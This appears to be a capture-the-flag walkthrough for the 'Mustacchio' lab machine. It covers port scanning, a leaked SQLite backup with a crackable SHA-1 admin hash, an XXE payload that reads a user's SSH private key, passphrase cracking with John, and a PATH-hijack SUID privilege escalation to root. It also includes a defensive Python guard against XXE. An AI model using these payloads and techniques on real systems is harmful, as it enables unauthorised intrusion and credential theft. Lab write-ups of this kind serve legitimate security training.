# Mustacchio

## Nmap

Start by running Nmap on all ports. We find that SSH is open, a website is served on port 80, and an admin login page is on port 8765.

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
|   256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_  256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Gobuster

Next, I ran Gobuster, which found the directory /custom. In that folder we find a file called users.bak.

{% code overflow="wrap" %}

```bash
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt | tee gobuster.log
```

{% endcode %}

## SQLite3

Once users.bak is downloaded, we can see that it is a SQLite database.

{% code overflow="wrap" lineNumbers="true" %}

```bash
file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
```

{% endcode %}

It can be opened with the command `sqlite3 users.bak`, and we can view its contents as follows:

{% code overflow="wrap" lineNumbers="true" %}

```bash
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
```

{% endcode %}

## Cracking the admin password

The stored value is a SHA-1 hash of the admin password and can be cracked easily at <https://crackstation.net/>.

## Login to the admin page

Once we have the credentials, we can use them to log in to the admin page on port 8765. On this page we can "Add a comment on the website". If we inspect the source code of the page, we find the following.

```html
<script type="text/javascript">
  //document.cookie = "Example=/auth/dontforget.bak";
  function checktarea() {
    let tbox = document.getElementById("box").value;
    if (tbox == null || tbox.length == 0) {
      alert("Insert XML Code!")
    }
  }
</script>
</head>
<body>

    <!-- Barry, you can now SSH in using your key!-->
```

This gives us three pieces of valuable information:

1. Someone called Barry can log in over SSH with his key.
2. The comment form accepts XML, so an XXE attack is the likely route.
3. The path /auth/dontforget.bak looks interesting.

If we start from the bottom, we can download the dontforget.bak file and view its content with the `cat` command.

{% code overflow="wrap" lineNumbers="true" %}

```bash
cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
```

{% endcode %}

This gives us the basic XML form we need to provide. We can combine it with an XXE payload that declares an external entity pointing at Barry's id\_rsa and references that entity inside the `<name>` element, so the key is echoed back in the rendered comment.

{% code overflow="wrap" lineNumbers="true" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <name>&name;</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
```

{% endcode %}
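The root cause here is a server-side parser that honours DTD and entity declarations in user-supplied XML. As an added example (not the room's code, and not the application's real parser), the guard below pre-scans a submitted `<comment>` document with a bare expat parser and refuses anything that declares a DOCTYPE or an entity before the application parser ever sees it; it assumes the upload format is exactly the three-field `<comment>` shape shown in dontforget.bak, and the sample inputs are constructed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXml(ValueError):
    """Raised when a document declares a DTD or any entity."""


def assert_no_dtd(xml_text: str) -> None:
    """Pre-scan with a bare expat parser: any DOCTYPE/ENTITY declaration aborts.
    Expat stops as soon as a handler raises, so the SYSTEM entity is never
    resolved; the guard does not depend on the real parser's own settings."""
    def refuse(*_args):
        raise UnsafeXml("DOCTYPE and entity declarations are not accepted")
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = refuse
    scanner.EntityDeclHandler = refuse
    scanner.Parse(xml_text, True)


def parse_comment(xml_text: str) -> dict:
    """Validate and extract the three fields of a <comment> document."""
    assert_no_dtd(xml_text)
    root = ET.fromstring(xml_text)
    if root.tag != "comment":
        raise ValueError("root element must be <comment>")
    fields = {}
    for tag in ("name", "author", "com"):
        node = root.find(tag)
        if node is None:
            raise ValueError(f"missing <{tag}>")
        fields[tag] = (node.text or "").strip()
    return fields


def is_accepted(xml_text: str) -> bool:
    """True if the document passes both the DTD guard and the shape check."""
    try:
        parse_comment(xml_text)
    except (UnsafeXml, ValueError, ET.ParseError, expat.ExpatError):
        return False
    return True


# Constructed samples: a benign comment in the dontforget.bak shape, and the
# same document carrying the external-entity DOCTYPE from the payload above.
BENIGN = """<?xml version="1.0"?>
<comment><name>Joe Hamd</name><author>Barry Clad</author>
<com>A short, harmless comment.</com></comment>"""

XXE = BENIGN.replace("<comment>", """<!DOCTYPE data [ <!ELEMENT data ANY >
 <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>""").replace("<name>Joe Hamd</name>", "<name>&name;</name>")
```

Rejecting the declaration outright is simpler and more portable than trying to configure every parser feature correctly, and a refused upload is also a clean signal to log and alert on.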

## id\_rsa

Once the id\_rsa is obtained, we can try to log in over SSH as Barry. Remember to restrict the permissions of the key first with `chmod 600 id_rsa`.

```bash
ssh barry@$IP -i id_rsa
```

However, we are prompted for the key's passphrase, which is not the same as the password we used to log in to the admin page.

## Obtain the password with John

We can use ssh2john and John the Ripper to crack the passphrase.

First, convert the key to the right format, then use John to crack it.

{% code lineNumbers="true" %}

```bash
ssh2john id_rsa > barryhash
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt
```

{% endcode %}

## Get first flag

Once we have logged in as Barry, we can get the first flag by viewing the file /home/barry/user.txt.

## Get root

Now we start by looking for SUID binaries with the command `find / -perm -u=s -type f 2>/dev/null`, which shows that `/home/joe/live_log` runs with root privileges.

If we use strings on that file, we find this interesting snippet.

`tail -f /var/log/nginx/access.log`

This seems to be a command that the binary executes. The proper way of confirming this is probably some reverse engineering, but since we roughly know what to look for, this is sufficient.

Let's create a custom `tail` script and hijack the PATH. The content of `tail` should look like this: a Bash script that copies /bin/bash to the /tmp folder and sets the SUID bit on the copy.

```bash
#!/bin/bash
# Saved as "tail" in the current directory and marked executable.
# Copy the shell and set it SUID so the copy runs with the owner's uid.
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
```

Next, we modify the PATH variable and execute the log file.

{% code lineNumbers="true" %}

```bash
export PATH="$(pwd):$PATH"
/home/joe/live_log
```

{% endcode %}

If everything was successful, we can now obtain a shell with root privileges by executing `/tmp/bash -p`.

We can verify that we have root privileges with the `id` command.

```
barry@mustacchio:/dev/shm$ /tmp/bash -p
bash-4.3# id
uid=1003(barry) gid=1003(barry) euid=0(root) groups=1003(barry),4(adm)
```

Now, find the last flag in */root/root.txt*.
